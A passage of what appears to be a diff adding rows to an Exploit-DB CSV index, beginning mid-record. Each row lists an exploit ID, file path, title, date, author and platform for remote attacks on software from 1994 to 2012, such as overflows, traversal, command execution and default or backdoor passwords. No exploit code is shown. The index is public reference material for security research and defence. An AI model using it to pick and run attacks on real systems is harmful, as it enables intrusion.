(MS12-037) (Metasploit)",2012-08-02,Metasploit,remote,windows, +20176,exploits/cgi/remote/20176.pl,"CGI Script Center Subscribe Me Lite 2.0 - Administrative Password Alteration (1)",2000-08-23,teleh0r,remote,cgi, +20177,exploits/cgi/remote/20177.html,"CGI Script Center Subscribe Me Lite 2.0 - Administrative Password Alteration (2)",2000-08-23,n30,remote,cgi, +20180,exploits/windows/remote/20180.c,"RobTex Viking Server 1.0.6 Build 355 - Remote Buffer Overflow",2000-08-28,wildcoyote,remote,windows, +20181,exploits/multiple/remote/20181.txt,"Kerberos 4 4.0/5 5.0 - KDC Spoofing",2000-08-28,"Dug Song",remote,multiple, +20182,exploits/windows/remote/20182.txt,"Ipswitch IMail 6.x - File Attachment",2000-08-30,Timescape,remote,windows, +20183,exploits/cgi/remote/20183.pl,"GWScripts News Publisher 1.0 - 'author.file' Write",2000-08-29,n30,remote,cgi, +20184,exploits/windows/remote/20184.txt,"eEye Digital Security IRIS 1.0.1 / SpyNet CaptureNet 3.0.12 - Remote Buffer Overflow",2000-08-31,"Ussr Labs",remote,windows, +20194,exploits/cgi/remote/20194.pl,"CGI Script Center Auction Weaver 1.0.2 - Remote Command Execution",2000-08-30,teleh0r,remote,cgi, +20299,exploits/windows/remote/20299.pl,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (2)",2000-10-21,"Roelof Temmingh",remote,windows, +20300,exploits/windows/remote/20300.c,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (3)",2000-10-17,zipo,remote,windows, +20202,exploits/windows/remote/20202.rb,"Cisco Linksys PlayerPT - ActiveX Control SetSource sURL argument Buffer Overflow (Metasploit)",2012-08-03,Metasploit,remote,windows, +20204,exploits/windows/remote/20204.rb,"Dell SonicWALL Scrutinizer 9 - SQL Injection (Metasploit)",2012-08-03,Metasploit,remote,windows, +20205,exploits/unix/remote/20205.rb,"Zenoss 3 - showDaemonXMLConfig Command Execution (Metasploit)",2012-08-03,Metasploit,remote,unix,8080 +20206,exploits/multiple/remote/20206.txt,"QSSL Voyager 2.0 1B - Arbitrary File Access",2000-09-01,neonbunny,remote,multiple, +20207,exploits/multiple/remote/20207.txt,"QSSL Voyager 2.0 1B - '.photon' Directory Information Disclosure",2000-09-01,neonbunny,remote,multiple, +20210,exploits/linux/remote/20210.txt,"Apache 1.3.12 - WebDAV Directory Listings",2000-09-07,Mnemonix,remote,linux, +20211,exploits/windows/remote/20211.c,"Mobius DocumentDirect for the Internet 1.2 - Remote Buffer Overflow",2000-09-08,wildcoyote,remote,windows, +20214,exploits/windows/remote/20214.pl,"Check Point Software Firewall-1 3.0/1 4.0 - Session Agent Impersonation",1998-09-24,"Andrew Danforth",remote,windows, +20215,exploits/multiple/remote/20215.pl,"Check Point Software Firewall-1 3.0/1 4.0/1 4.1 - Session Agent Dictionary Attack (1)",2000-08-15,"Nelson Brito",remote,multiple, +20216,exploits/multiple/remote/20216.sh,"Check Point Software Firewall-1 3.0/1 4.0/1 4.1 - Session Agent Dictionary Attack (2)",2000-10-01,"Gregory Duchemin",remote,multiple, +20218,exploits/cgi/remote/20218.txt,"YaBB 9.1.2000 - Arbitrary File Read",2000-09-10,pestilence,remote,cgi, +20220,exploits/linux/remote/20220.txt,"Mandrake 6.1/7.0/7.1 - '/perl' HTTP Directory Disclosure",2000-09-11,anonymous,remote,linux, +20222,exploits/windows/remote/20222.cpp,"Microsoft Windows Server 2000 - 'telnet.exe' NTLM Authentication",2000-08-14,@stake,remote,windows, +20223,exploits/windows/remote/20223.txt,"Sambar Server 4.3/4.4 Beta 3 - Search CGI",2000-09-15,dethy,remote,windows, +20224,exploits/windows/remote/20224.txt,"CamShot WebCam 2.6 Trial - Remote Buffer Overflow",2000-09-15,SecuriTeam,remote,windows, +20231,exploits/hardware/remote/20231.txt,"Cisco PIX Firewall 4.x/5.x - SMTP Content Filtering Evasion",2000-09-19,"Lincoln Yeoh",remote,hardware, +20234,exploits/multiple/remote/20234.txt,"extent technologies rbs isp 2.5 - Directory Traversal",2000-09-21,anon,remote,multiple,8002 +20235,exploits/windows/remote/20235.pl,"Cisco Secure ACS for Windows NT 2.42 - Remote Buffer Overflow",2000-09-21,blackangels,remote,windows, +20236,exploits/linux/remote/20236.txt,"SuSE Linux 6.3/6.4 - Installed Package Disclosure",2000-09-21,t0maszek,remote,linux, +20237,exploits/linux/remote/20237.c,"UoW Pine 4.0.4/4.10/4.21 - 'From:' Remote Buffer Overflow",2000-09-23,Arkane,remote,linux, +20238,exploits/cgi/remote/20238.txt,"Alabanza Control Panel 3.0 - Domain Modification",2000-09-24,"Weihan Leow",remote,cgi, +20240,exploits/windows/remote/20240.txt,"Microsoft Windows Media Player 7 - Embedded OCX Control",2000-09-26,"Ussr Labs",remote,windows, +20242,exploits/cgi/remote/20242.txt,"Unixware 7.0 - SCOhelp HTTP Server Format String",2000-09-26,"Juliano Rizzo",remote,cgi, +20243,exploits/windows/remote/20243.html,"Microsoft Windows Script Host 5.1/5.5 - 'GetObject()' File Disclosure",2000-09-26,"Georgi Guninski",remote,windows, +20244,exploits/cgi/remote/20244.txt,"TalentSoft Web+ Client/Monitor/server 4.6 - Internal IP Address Disclosure",2000-09-27,"Delphis Consulting",remote,cgi, +20245,exploits/cgi/remote/20245.txt,"TalentSoft Web+ Client/Monitor/server 4.6 - Source Code Disclosure",2000-09-27,"Delphis Consulting",remote,cgi, +20246,exploits/linux/remote/20246.txt,"TalentSoft Web+ Application Server (Linux) 4.6 - Example Script File Disclosure",2000-09-26,DCIST,remote,linux, +20247,exploits/windows/remote/20247.txt,"Smartwin Technology CyberOffice Shopping Cart 2.0 - Price Modification",2000-10-02,"Delphis Consulting",remote,windows, +20248,exploits/windows/remote/20248.txt,"SmartWin CyberOffice Shopping Cart 2.0 - Client Information Disclosure",2000-10-02,DCIST,remote,windows, +20249,exploits/windows/remote/20249.txt,"David Harris Pegasus Mail 3.12 - File Forwarding",2000-10-03,"Imran Ghory",remote,windows, +20253,exploits/linux/remote/20253.sh,"OpenSSH 1.2 - '.scp' File Create/Overwrite",2000-09-30,"Michal Zalewski",remote,linux, +20258,exploits/multiple/remote/20258.c,"HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - rpc.ypupdated Command Execution (1)",1994-02-07,"Josh D",remote,multiple, +20259,exploits/multiple/remote/20259.txt,"HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - rpc.ypupdated Command Execution (2)",1994-02-07,anonymous,remote,multiple, +20500,exploits/php/remote/20500.rb,"TestLink 1.9.3 - Arbitrary File Upload (Metasploit)",2012-08-15,Metasploit,remote,php, +20266,exploits/windows/remote/20266.txt,"Microsoft Virtual Machine 2000/3100/3200/3300 Series - 'com.ms.activeX.ActiveXComponent' Arbitrary Program Execution",2000-10-05,"Marcin Jackowski",remote,windows, +20298,exploits/windows/remote/20298.c,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (1)",2000-10-17,"Gabriel Maggiotti",remote,windows, +20269,exploits/windows/remote/20269.txt,"Microsoft IIS 5.0 - Indexed Directory Disclosure",2000-10-04,"David Litchfield",remote,windows, +20273,exploits/cgi/remote/20273.txt,"Moreover CGI script - File Disclosure",2000-10-02,CDI,remote,cgi, +20277,exploits/cgi/remote/20277.txt,"Armada Design Master Index 1.0 - Directory Traversal",2000-07-18,pestilence,remote,cgi, +20279,exploits/cgi/remote/20279.txt,"extropia webstore 1.0/2.0 - Directory Traversal",2000-10-09,f0bic,remote,cgi, +20280,exploits/cgi/remote/20280.txt,"Bytes interactive Web shopper 1.0/2.0 - Directory Traversal",2000-10-08,f0bic,remote,cgi, +20281,exploits/cgi/remote/20281.txt,"Hassan Consulting Shopping Cart 1.18 - Directory Traversal",2000-10-07,f0bic,remote,cgi, +20283,exploits/windows/remote/20283.txt,"Microsoft Windows 9x/ME - Share Level Password Bypass (1)",2000-10-10,stickler,remote,windows, +20284,exploits/windows/remote/20284.txt,"Microsoft Windows 9x/ME - Share Level Password Bypass (2)",2000-10-10,"Gabriel Maggiotti",remote,windows, +20286,exploits/php/remote/20286.c,"PHP 3.0/4.0 - Error Logging Format String",2000-10-12,anonymous,remote,php, +20287,exploits/windows/remote/20287.c,"Nevis Systems All-Mail 1.1 - Remote Buffer Overflow",2000-10-10,@stake,remote,windows, +20288,exploits/windows/remote/20288.c,"Microsoft Windows 9x - File Handle Buffer Overflow",2000-07-10,Nsfocus,remote,windows, +20292,exploits/freebsd/remote/20292.pl,"cURL 6.1 < 7.4 - Remote Buffer Overflow (1)",2000-10-13,zillion,remote,freebsd, +20293,exploits/linux/remote/20293.pl,"cURL 6.1 < 7.4 - Remote Buffer Overflow (2)",2000-10-13,zillion,remote,linux, +20297,exploits/windows/remote/20297.rb,"Oracle AutoVue - ActiveX Control SetMarkupMode Buffer Overflow (Metasploit)",2012-08-06,Metasploit,remote,windows, +20302,exploits/windows/remote/20302.pl,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (5)",2000-10-17,"Andrea Spabam",remote,windows, +20303,exploits/cgi/remote/20303.pl,"Oatmeal Studios Mail File 1.10 - Arbitrary File Disclosure",2000-10-11,"Dirk Brockhausen",remote,cgi, +20305,exploits/windows/remote/20305.txt,"Microsoft Site Server 2.0 with IIS 4.0 - Arbitrary File Upload",1999-01-30,Mnemonix,remote,windows, +20306,exploits/windows/remote/20306.html,"Microsoft Virtual Machine - Arbitrary Java Codebase Execution",2000-10-18,"Georgi Guninski",remote,windows, +20308,exploits/linux/remote/20308.c,"Samba 1.9.19 - 'Password' Remote Buffer Overflow",1997-09-25,root@adm.kix-azz.org,remote,linux, +20309,exploits/windows/remote/20309.txt,"Microsoft IIS 3.0 - 'newdsn.exe' File Creation",1997-08-25,"Vytis Fedaravicius",remote,windows, +20313,exploits/multiple/remote/20313.txt,"Allaire JRun 3 - Directory Disclosure",2000-10-23,"Foundstone Labs",remote,multiple, +20314,exploits/multiple/remote/20314.txt,"Allaire JRun 2.3 - Arbitrary Code Execution",2000-10-23,"Foundstone Labs",remote,multiple, +20315,exploits/multiple/remote/20315.txt,"Allaire JRun 2.3 - File Source Code Disclosure",2000-10-23,"Foundstone Labs",remote,multiple, +20318,exploits/windows/remote/20318.txt,"Oracle Business Transaction Management Server 12.1.0.2.7 - FlashTunnelService WriteToFile Message Remote Code Execution",2012-08-07,rgod,remote,windows, +20319,exploits/windows/remote/20319.txt,"Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService - Remote File Deletion",2012-08-07,rgod,remote,windows, +20321,exploits/windows/remote/20321.rb,"Ubisoft uplay 2.0.3 - ActiveX Control Arbitrary Code Execution (Metasploit)",2012-08-08,Metasploit,remote,windows, +20322,exploits/multiple/remote/20322.html,"Sun HotJava Browser 3 - Arbitrary DOM Access",2000-10-25,"Georgi Guninski",remote,multiple, +20324,exploits/windows/remote/20324.txt,"iPlanet Certificate Management System 4.2 - Directory Traversal",2000-10-25,CORE-SDI,remote,windows, +20325,exploits/windows/remote/20325.txt,"Netscape Directory Server 4.12 - Directory Server Directory Traversal",2000-10-25,CORE-SDI,remote,windows, +20327,exploits/unix/remote/20327.txt,"GNU Ffingerd 1.19 - 'Username' Validity Disclosure",1999-08-23,"Eilon Gishri",remote,unix, +20330,exploits/hardware/remote/20330.pl,"Cisco Catalyst 3500 XL - Arbitrary Command Execution",2000-10-26,blackangels,remote,hardware, +20334,exploits/windows/remote/20334.java,"Cat Soft Serv-U FTP Server 2.5.x - Brute Force",2000-10-29,Craig,remote,windows, +20335,exploits/windows/remote/20335.txt,"Microsoft Indexing Service (Windows 2000/NT 4.0) - '.htw' Cross-Site Scripting",2000-10-28,"Georgi Guninski",remote,windows, +20337,exploits/unix/remote/20337.c,"tcpdump 3.4/3.5 - AFS ACL Packet Buffer Overflow",2001-01-02,Zhodiac,remote,unix, +20340,exploits/unix/remote/20340.c,"Samba 2.0.7 - SWAT Logging Failure",2000-11-01,dodeca-T,remote,unix, +20354,exploits/php/remote/20354.rb,"PHP IRC Bot pbot - 'eval()' Remote Code Execution (Metasploit)",2012-08-08,Metasploit,remote,php, +20355,exploits/windows/remote/20355.rb,"Plixer Scrutinizer NetFlow and sFlow Analyzer 9 - Default MySQL Credential (Metasploit)",2012-08-08,Metasploit,remote,windows, +20369,exploits/hardware/remote/20369.sh,"Cisco PIX Firewall 5.2 - PASV Mode FTP Internal Address Disclosure",2000-10-03,"Fabio Pietrosanti",remote,hardware, +20370,exploits/cgi/remote/20370.txt,"Kootenay Web Inc whois 1.0 - Remote Command Execution",2000-10-29,"Mark Stratman",remote,cgi, +20371,exploits/windows/remote/20371.txt,"Microsoft Windows 95/Windows for Workgroups - 'smbclient' Directory Traversal",1995-10-30,"Dan Shearer",remote,windows, +20372,exploits/hardware/remote/20372.pl,"Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3 - Remote Username / Password Retrieval",2000-10-26,@stake,remote,hardware, +20374,exploits/unix/remote/20374.c,"ISC BIND 8.1 - Host Remote Buffer Overflow",2000-10-27,antirez,remote,unix, +20375,exploits/windows/remote/20375.txt,"Sun Java Web Server 1.1 Beta - Viewable .jhtml Source",1997-07-16,"Brian Krahmer",remote,windows, +20384,exploits/windows/remote/20384.txt,"Microsoft IIS 4.0/5.0 - Executable File Parsing",2000-11-06,Nsfocus,remote,windows, +20387,exploits/cgi/remote/20387.txt,"YaBB 9.11.2000 - 'search.pl' Arbitrary Command Execution",2000-11-07,rpc,remote,cgi, +20392,exploits/windows/remote/20392.rb,"NetDecision 4.2 - TFTP Writable Directory Traversal Execution (Metasploit)",2012-08-10,Metasploit,remote,windows, +20394,exploits/unix/remote/20394.c,"BNC 2.2.4/2.4.6/2.4.8 - IRC Proxy Buffer Overflow (1)",1998-12-26,duke,remote,unix, +20395,exploits/unix/remote/20395.c,"BNC 2.2.4/2.4.6/2.4.8 - IRC Proxy Buffer Overflow (2)",1998-12-26,"jamez & dumped",remote,unix, +20397,exploits/cgi/remote/20397.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 - Full Path Disclosure",2000-11-10,sozni,remote,cgi, +20399,exploits/windows/remote/20399.html,"Microsoft Indexing Service (Windows 2000) - File Verification",2000-11-10,"Georgi Guninski",remote,windows, +20404,exploits/beos/remote/20404.txt,"Joe Kloss RobinHood 1.1 - Remote Buffer Overflow",2000-11-14,Vort-fu,remote,beos, +20405,exploits/cgi/remote/20405.pl,"DCForum 1-6 - Arbitrary File Disclosure",2000-11-14,steeLe,remote,cgi, +20406,exploits/multiple/remote/20406.txt,"RealServer 5.0/6.0/7.0 - Memory Contents Disclosure",2000-11-16,CORE-SDI,remote,multiple, +20408,exploits/cgi/remote/20408.txt,"Markus Triska CGIForum 1.0 - 'thesection' Directory Traversal",2000-11-20,zorgon,remote,cgi, +20412,exploits/jsp/remote/20412.txt,"Unify eWave ServletExec 3 - .JSP Source Disclosure",2000-11-21,"Wojciech Woch",remote,jsp, +20413,exploits/unix/remote/20413.txt,"BB4 Big Brother Network Monitor 1.5 d2 - 'bb-hist.sh?HISTFILE' File Existence Disclosure",2000-11-20,"f8 Research Labs",remote,unix, +20414,exploits/unix/remote/20414.c,"Ethereal - AFS Buffer Overflow",2000-11-18,mat,remote,unix, +20424,exploits/windows/remote/20424.txt,"Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script (MS00-090)",2000-11-22,"Sandro Gauci",remote,windows, +20423,exploits/cgi/remote/20423.txt,"NCSA httpd-campas 1.2 - sample script",1997-07-15,"Francisco Torres",remote,cgi, +20425,exploits/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 - Insecure Registration",2000-11-22,"Joey Maier",remote,multiple, +20426,exploits/windows/remote/20426.html,"Microsoft Internet Explorer 5.5 - 'Index.dat' (MS00-055)",2000-11-23,"Georgi Guninski",remote,windows, +20427,exploits/windows/remote/20427.txt,"Microsoft Windows Media Player 7.0 - '.asx' Remote Buffer Overflow",2000-11-22,@stake,remote,windows, +20429,exploits/jsp/remote/20429.txt,"Caucho Technology Resin 1.2 - JSP Source Disclosure",2000-11-23,benjurry,remote,jsp, +20430,exploits/cgi/remote/20430.txt,"Info2www 1.0/1.1 - CGI Input Handling",1998-03-03,"Niall Smart",remote,cgi, +20433,exploits/cgi/remote/20433.txt,"CGI City CC Whois 1.0 - MetaCharacter",1999-11-09,"Cody T. - hhp",remote,cgi, +20434,exploits/cgi/remote/20434.txt,"Miva htmlscript 2.x - Directory Traversal",1998-01-26,"Dennis Moore",remote,cgi, +20435,exploits/cgi/remote/20435.txt,"Apache 0.8.x/1.0.x / NCSA httpd 1.x - test-cgi Directory Listing",1996-04-01,@stake,remote,cgi, +20441,exploits/multiple/remote/20441.txt,"IBM Net.Data 7.0 - Full Path Disclosure",2000-11-29,"Chad Kalmes",remote,multiple, +20442,exploits/cgi/remote/20442.html,"Greg Matthews - 'Classifieds.cgi' 1.0 Hidden Variable",1998-12-15,anonymous,remote,cgi, +20444,exploits/cgi/remote/20444.txt,"Greg Matthews - 'Classifieds.cgi' 1.0 MetaCharacter",1998-12-15,anonymous,remote,cgi, +20445,exploits/windows/remote/20445.txt,"Microsoft IIS 1.0 / Netscape Server 1.0/1.12 / OReilly WebSite Professional 1.1b - '.cmd' / '.CMD' Remote Command Execution",1996-03-01,anonymous,remote,windows, +20446,exploits/cgi/remote/20446.txt,"WebCom datakommunikation Guestbook 0.1 - 'wguest.exe' Arbitrary File Access",1999-04-09,Mnemonix,remote,cgi, +20447,exploits/cgi/remote/20447.txt,"WebCom datakommunikation Guestbook 0.1 - 'rguest.exe' Arbitrary File Access",1999-04-09,Mnemonix,remote,cgi, +20448,exploits/cgi/remote/20448.txt,"Novell NetWare Web Server 2.x - convert.bas",1996-07-03,"TTT Group",remote,cgi, +20449,exploits/unix/remote/20449.txt,"GlimpseHTTP 1.0/2.0 / WebGlimpse 1.0 - Piped Command",1996-07-03,"Razvan Dragomirescu",remote,unix, +20450,exploits/multiple/remote/20450.txt,"Trlinux Postaci Webmail 1.1.3 - Password Disclosure",2000-11-30,"Michael R. Rudel",remote,multiple, +20459,exploits/windows/remote/20459.html,"Microsoft Internet Explorer 5 - 'INPUT TYPE=FILE' Remote File Upload",2000-12-01,Key,remote,windows, +20460,exploits/windows/remote/20460.txt,"Microsoft Windows NT 4.0 - Phonebook Server Buffer Overflow",2000-12-04,"Alberto Solino",remote,windows, +20461,exploits/windows/remote/20461.txt,"Cat Soft Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal",2000-12-05,Zoa_Chien,remote,windows, +20462,exploits/unix/remote/20462.txt,"Hylafax 4.0 pl2 Faxsurvey - Remote Command Execution",1998-08-04,Tom,remote,unix, +20463,exploits/cgi/remote/20463.txt,"WEBgais 1.0 - Remote Command Execution",1997-07-10,"Razvan Dragomirescu",remote,cgi, +20465,exploits/cgi/remote/20465.sh,"Squid Web Proxy 2.2 - 'cachemgr.cgi' Unauthorized Connection",1999-07-23,fsaa,remote,cgi, +20466,exploits/multiple/remote/20466.txt,"Apache 1.3 + PHP 3 - File Disclosure",2000-12-06,"china nsl",remote,multiple, +20467,exploits/multiple/remote/20467.txt,"Inktomi Search Software 3.0 - Source Disclosure",2000-12-05,"china nsl",remote,multiple, +20468,exploits/multiple/remote/20468.txt,"Inktomi Search Software 3.0 - Information Disclosure",2000-12-05,"china nsl",remote,multiple, +20469,exploits/unix/remote/20469.txt,"Endymion MailMan 3.0.x - Arbitrary Command Execution",2000-12-06,"Secure Reality Advisories",remote,unix, +20472,exploits/multiple/remote/20472.txt,"IBM DB2 - Universal Database for Linux 6.1/Windows NT 6.1 Known Default Password",2000-12-05,benjurry,remote,multiple, +20481,exploits/windows/remote/20481.txt,"Microsoft IIS 2.0/3.0 - Appended Dot Script Source Disclosure",1997-02-20,"Mark Joseph Edwards",remote,windows, +20482,exploits/novell/remote/20482.txt,"Novell Netware Web Server 3.x - files.pl",1998-12-01,anonymous,remote,novell, +20483,exploits/cgi/remote/20483.txt,"WEBgais 1.0 - websendmail Remote Command Execution",1997-07-04,"Razvan Dragomirescu",remote,cgi, +20486,exploits/unix/remote/20486.html,"Matt Wright FormMail 1.x - Cross-Site Request Forgery",1997-01-01,anonymous,remote,unix, +20488,exploits/windows/remote/20488.txt,"MetaProducts Offline Explorer 1.x - FileSystem Disclosure",2000-12-07,Dodger,remote,windows, +20489,exploits/windows/remote/20489.txt,"keware technologies homeseer 1.4 - Directory Traversal",2000-12-07,"SNS Research",remote,windows, +20490,exploits/unix/remote/20490.c,"BitchX IRC Client 1.0 c17 - DNS Buffer Overflow",2000-12-04,nimrood,remote,unix, +20491,exploits/multiple/remote/20491.txt,"KTH Kerberos 4 - Arbitrary Proxy Usage",2000-12-08,"Jouko Pynnonen",remote,multiple, +20492,exploits/unix/remote/20492.txt,"ssldump 0.9 b1 - Format String",2000-12-11,c0ncept,remote,unix, +20495,exploits/unix/remote/20495.c,"Oops Proxy Server 1.4.22 - Remote Buffer Overflow (1)",2000-12-11,CyRaX,remote,unix, +20496,exploits/linux/remote/20496.c,"Oops Proxy Server 1.4.22 - Remote Buffer Overflow (2)",2000-12-07,diman,remote,linux, +20497,exploits/cgi/remote/20497.html,"Leif M. Wright everythingform.cgi 2.0 - Arbitrary Command Execution",2000-12-11,rpc,remote,cgi, +20501,exploits/windows/remote/20501.rb,"Cyclope Employee Surveillance Solution 6.0 - SQL Injection (Metasploit)",2012-08-15,Metasploit,remote,windows,7879 +20502,exploits/java/remote/20502.rb,"Novell ZENworks Asset Management - Remote Execution (Metasploit)",2012-08-15,Metasploit,remote,java,8080 +20503,exploits/cgi/remote/20503.html,"Leif M. Wright simplestmail.cgi 1.0 - Remote Command Execution",2000-12-11,rpc,remote,cgi, +20504,exploits/cgi/remote/20504.html,"Leif M. Wright - 'ad.cgi' 1.0 Unchecked Input",2000-12-11,rpc,remote,cgi, +20506,exploits/cgi/remote/20506.html,"Leif M. Wright simplestguest.cgi 2.0 - Remote Command Execution",2000-12-14,suid,remote,cgi, +20507,exploits/multiple/remote/20507.txt,"alex heiphetz Group eZshopper 2.0/3.0 - Directory Traversal",2000-12-13,Nsfocus,remote,multiple, +20510,exploits/windows/remote/20510.txt,"AOL Instant Messenger 3.5.1856/4.0/4.1.2010/4.2.1193 - 'aim://' Remote Buffer Overflow",2000-12-12,"Joe Testa",remote,windows, +20511,exploits/windows/remote/20511.txt,"AOL Instant Messenger 4.0/4.1.2010/4.2.1193 - BuddyIcon Buffer Overflow",2000-12-12,@stake,remote,windows, +20512,exploits/unix/remote/20512.txt,"BSD ftpd 0.3.2 - Single Byte Buffer Overflow",2000-12-18,Scrippie,remote,unix, +20513,exploits/multiple/remote/20513.txt,"iCat Electronic Commerce Suite 3.0 - File Disclosure",1997-11-08,"Mikael Johansson",remote,multiple, +20516,exploits/multiple/remote/20516.txt,"BEA Systems WebLogic Server 4.0 x/4.5 x/5.1 x - Double Dot Buffer Overflow",2000-12-19,peter.grundl,remote,multiple, +20519,exploits/multiple/remote/20519.c,"Check Point Software Firewall-1 4.1 SP2 - Fast Mode TCP Fragment",2000-12-14,"Thomas Lopatic",remote,multiple, +20522,exploits/cgi/remote/20522.txt,"Technote 2000/2001 - 'board' File Disclosure",2000-12-23,bt,remote,cgi, +20523,exploits/cgi/remote/20523.pl,"Technote 2000/2001 - 'Filename' Command Execution / File Disclosure",2000-12-27,Ksecurity,remote,cgi, +20524,exploits/cgi/remote/20524.txt,"Brian Stanback bsguest.cgi 1.0 - Remote Command Execution",2000-12-20,rivendell_team,remote,cgi, +20525,exploits/cgi/remote/20525.txt,"Brian Stanback bslist.cgi 1.0 - Remote Command Execution",2000-12-20,rivendell_team,remote,cgi, +20527,exploits/cgi/remote/20527.txt,"Informix Webdriver 1.0 - Remote Administration Access",2000-12-30,isno,remote,cgi, +20528,exploits/windows/remote/20528.html,"Microsoft Windows Media Player 7.0 - JavaScript URL",2001-01-01,"Georgi Guninski",remote,windows, +20529,exploits/multiple/remote/20529.pl,"Lotus Domino Server 5.0.x - Directory Traversal (1)",2001-01-15,"Michael Smith",remote,multiple, +20530,exploits/multiple/remote/20530.sh,"Lotus Domino Server 5.0.x - Directory Traversal (2)",2001-01-05,"Georgi Guninski",remote,multiple, +20533,exploits/cgi/remote/20533.txt,"eXtropia bbs_forum.cgi 1.0 - Arbitrary Command Execution",2001-01-07,scott,remote,cgi, +20537,exploits/multiple/remote/20537.txt,"Borland/Inprise Interbase 4.0/5.0/6.0 - Backdoor Password",2001-01-10,"Frank Schlottmann-Goedde",remote,multiple, +20547,exploits/windows/remote/20547.txt,"Microsoft Internet Explorer - Time Element Memory Corruption (MS11-050)",2012-08-16,Ciph3r,remote,windows, +20551,exploits/linux/remote/20551.pl,"E-Mail Security Virtual Appliance (ESVA) - Remote Execution",2012-08-16,iJoo,remote,linux, +20553,exploits/windows/remote/20553.html,"Microsoft Windows Media Player 7.0 - '.wmz' Arbitrary Java Applet",2001-01-15,"Georgi Guninski",remote,windows, +20557,exploits/windows/remote/20557.pl,"Omnicron OmniHTTPd 2.0.7 - File Corruption / Command Execution",2001-08-01,"Joe Testa",remote,windows, +20559,exploits/windows/remote/20559.c,"tinyproxy tinyproxy 1.3.2/1.3.3 - Remote Heap Overflow",2001-01-17,CyRaX,remote,windows, +20563,exploits/unix/remote/20563.txt,"WU-FTPD 2.4.2/2.5 .0/2.6.0/2.6.1/2.6.2 - FTP Conversion",1999-12-20,suid,remote,unix, +20565,exploits/hardware/remote/20565.c,"HP JetDirect rev. G.08.x/rev. H.08.x/x.08.x/J3111A - LCD Display Modification",1997-12-08,sili,remote,hardware, +20567,exploits/cgi/remote/20567.txt,"PHP PHP/fi 2.0 - Directory Traversal",1997-04-16,Shamanski,remote,cgi, +20568,exploits/sco/remote/20568.txt,"Skunkware 2.0 - view-source Directory Traversal",1997-04-16,myst,remote,sco, +20569,exploits/linux/remote/20569.c,"mICQ 0.4.6 - Remote Buffer Overflow",2001-01-17,"tHE rECIdjVO",remote,linux, +20570,exploits/cgi/remote/20570.txt,"Sambar Server 4.1 Beta - Admin Access",1998-06-10,"Michiel de Weerd",remote,cgi, +20571,exploits/windows/remote/20571.txt,"Microsoft Outlook 2000 0/98 0/Express 5.5 - Concealed Attachment",2001-01-17,http-equiv,remote,windows, +20612,exploits/windows/remote/20612.txt,"informs picserver 1.0 - Directory Traversal",2001-02-05,joetesta,remote,windows, +20582,exploits/windows/remote/20582.c,"Icecast 1.3.7/1.3.8 - 'print_client()' Format String",2001-01-21,CyRaX,remote,windows, +20583,exploits/cgi/remote/20583.pl,"textcounter.pl 1.2 - Arbitrary Command Execution",1998-06-24,"Doru Petrescu",remote,cgi, +20584,exploits/windows/remote/20584.txt,"fastream ftp++ 2.0 - Directory Traversal",2001-01-22,"SNS Research",remote,windows, +20590,exploits/windows/remote/20590.txt,"Microsoft IIS 3.0/4.0 - Upgrade BDIR.HTR",1998-12-25,"rain forest puppy",remote,windows, +20591,exploits/multiple/remote/20591.txt,"Netscape Enterprise Server 3.0/4.0 - 'Index' Disclosure",2001-01-24,"Security Research Team",remote,multiple, +20592,exploits/jsp/remote/20592.txt,"Oracle 8.1.7 - JSP/JSPSQL Remote File Reading",2000-01-22,"Georgi Guninski",remote,jsp, +20593,exploits/freebsd/remote/20593.txt,"FreeBSD 3.x/4.x - 'ipfw' Filtering Evasion",2001-01-23,"Aragon Gouveia",remote,freebsd, +20594,exploits/unix/remote/20594.txt,"WU-FTPD 2.4.2/2.5/2.6 - Debug Mode Client Hostname Format String",2001-01-23,"Wu-ftpd team",remote,unix, +20595,exploits/multiple/remote/20595.txt,"NCSA 1.3/1.4.x/1.5 / Apache HTTPd 0.8.11/0.8.14 - ScriptAlias Source Retrieval",1999-09-25,anonymous,remote,multiple, +20597,exploits/linux/remote/20597.txt,"Majordomo 1.89/1.90 - lists Command Execution",1994-06-06,"Razvan Dragomirescu",remote,linux, +20599,exploits/unix/remote/20599.sh,"Sendmail 8.6.9 IDENT - Remote Command Execution",1994-02-24,CIAC,remote,unix, +20600,exploits/windows/remote/20600.c,"SmartMax MailMax 1.0 - SMTP Buffer Overflow",1999-02-13,_mcp_,remote,windows, +20601,exploits/multiple/remote/20601.txt,"iweb hyperseek 2000 - Directory Traversal",2001-01-28,"MC GaN",remote,multiple, +20602,exploits/solaris/remote/20602.c,"Solaris x86 2.4/2.5 - nlps_server Buffer Overflow",1998-04-01,"Last Stage of Delirium",remote,solaris, +20605,exploits/windows/remote/20605.cpp,"Apple QuickTime plugin - Windows 4.1.2 (Japanese) Remote Overflow",2012-08-18,UNYUN,remote,windows, +20606,exploits/cgi/remote/20606.pl,"qDecoder 4.x/5.x - Remote Buffer Overflow",2000-03-26,"Jin Ho You",remote,cgi, +20607,exploits/windows/remote/20607.txt,"GoAhead Web Server 2.0/2.1 - Directory Traversal",2001-02-02,"Sergey Nenashev",remote,windows, +20608,exploits/windows/remote/20608.txt,"Guido Frassetto SEDUM HTTP Server 2.0 - Directory Traversal",2001-02-04,"Joe Testa",remote,windows, +20609,exploits/cgi/remote/20609.txt,"Heat-On HSWeb Web Server 2.0 - Full Path Disclosure",2001-02-04,"Joe Testa",remote,cgi, +20611,exploits/cgi/remote/20611.txt,"anaconda Foundation 1.4 < 1.9 - Directory Traversal",2000-10-13,pestilence,remote,cgi, +20614,exploits/windows/remote/20614.txt,"aolserver 3.2 Win32 - Directory Traversal",2001-02-06,joetesta,remote,windows, +20615,exploits/unix/remote/20615.txt,"SSH 1.2.30 - Daemon Logging Failure",2001-02-05,"Jose Nazario",remote,unix, 